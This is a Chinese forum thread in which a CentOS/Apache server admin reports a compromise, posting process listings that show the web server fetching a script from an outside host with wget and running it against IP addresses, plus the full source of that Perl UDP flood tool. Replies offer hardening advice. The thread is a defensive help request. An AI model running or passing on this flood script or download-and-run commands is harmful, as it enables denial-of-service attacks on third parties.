系统:centos4   apache2.2.6+php4.4.7

ps -axuf 查看:

root      4826  0.0  0.1 11372 4932 ?        Ss   Sep11   0:07 /usr/local/httpd/bin/httpd -k start
nobody   18607  0.0  0.1 12240 5204 ?        S    07:55   0:01  \_ /usr/local/httpd/bin/httpd -k start
nobody   18730  0.0  0.0  6312 1060 ?        S    08:24   0:00  |   \_ sh -c cd /tmp;./udp.pl 200.149.101.147 53 200
nobody   18731  100  0.0  7172 2212 ?        R    08:24  46:24  |       \_ /usr/bin/perl ./udp.pl 200.149.101.147 53 200
nobody   18612  0.0  0.1 12232 5188 ?        S    07:55   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18714  0.0  0.0  6092 1060 ?        S    08:23   0:00  |   \_ sh -c cd /tmp;wget bym.t35.com/ddos/udp.pl;chmod 777 u
nobody   18715  0.0  0.0  7460 1604 ?        S    08:23   0:00  |       \_ wget bym.t35.com/ddos/udp.pl
nobody   18642  0.0  0.1 12304 5180 ?        S    08:08   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18646  0.0  0.0  6388 1060 ?        S    08:11   0:00  |   \_ sh -c cd /tmp;wget http://bym.t35.com/ddos/udp.pl
nobody   18647  0.0  0.0  7508 1608 ?        S    08:11   0:00  |       \_ wget http://bym.t35.com/ddos/udp.pl
nobody   18655  0.0  0.1 12356 5188 ?        S    08:12   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18686  0.0  0.0  7240 1056 ?        S    08:15   0:00  |   \_ sh -c cd /tmp;perl udp.pl 200.149.101.148 80 500
nobody   18687 99.8  0.0  7544 2212 ?        R    08:15  54:58  |       \_ perl udp.pl 200.149.101.148 80 500
nobody   18695  0.0  0.1 12356 5180 ?        S    08:18   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18712  0.0  0.0  6460 1060 ?        S    08:22   0:00  |   \_ sh -c cd /tmp;wget bym.t35.com/ddos/udp.pl;chmod 777 u
nobody   18713  0.0  0.0  8624 1588 ?        S    08:22   0:00  |       \_ wget bym.t35.com/ddos/udp.pl



在tmp 目录下面有 udp.pl文件，内容如下：

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "udp flood - odix\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (; {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (; {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

大家帮忙看看
什么原因阿？刚开始以为是php和apache得版本太低，昨天刚升级到最新版本，还是这样！　　　　　　

同时还打开了一个udp 端口，端口运行的是 ./bash
把进程杀死后，udp端口也就关闭了。　　　　　　

是有点可疑

复制内容到剪贴板

代码:

#last

看看怎么说。　　　　　　

bash 的端口应该是TCP的吧

你检查一下 web服务 是不是有任意用户可上传的漏洞.
他们利用了 httpd 的漏洞来调用程序实现攻击, 应该还没有进入你的系统.　　　　　　

netstat查看是udp端口，3万以上的

last 查看没有任何可疑登陆　　　　　　

“你检查一下 web服务 是不是有任意用户可上传的漏洞” 这个怎么检查啊？
麻烦斑竹明示！谢谢！　　　　　　

不有可疑了,中毒了没错,不知道楼主有没有装瑞星杀毒软件,如果有赶紧在安全模式下去杀,估计不会有多大问题.　　　　　　

引用:

原帖由 yjuutrhe 于 2007-9-22 17:39 发表
不有可疑了,中毒了没错,不知道楼主有没有装瑞星杀毒软件,如果有赶紧在安全模式下去杀,估计不会有多大问题.

瑞星嘛，好像还没有这个本事吧~~~　　　　　　

用的是linux系统
centos 4.5　　　　　　

引用:

原帖由 wuyuhua_2000 于 2007-9-22 17:38 发表
“你检查一下 web服务 是不是有任意用户可上传的漏洞” 这个怎么检查啊？
麻烦斑竹明示！谢谢！

查/etc/httpd（版本不同，可能目录不太一样，但是一般是这个目录）下的httpd.conf里的allow字段吧，还有Documents（放网站内容的目录）下的权限是不是变成777属性了，改成755属性。
还有，如果使用ftp上传、管理网站的话，最好改成scp（基于ssh的传输），将ftp服务器关掉。
Roc.Ken看看够不够？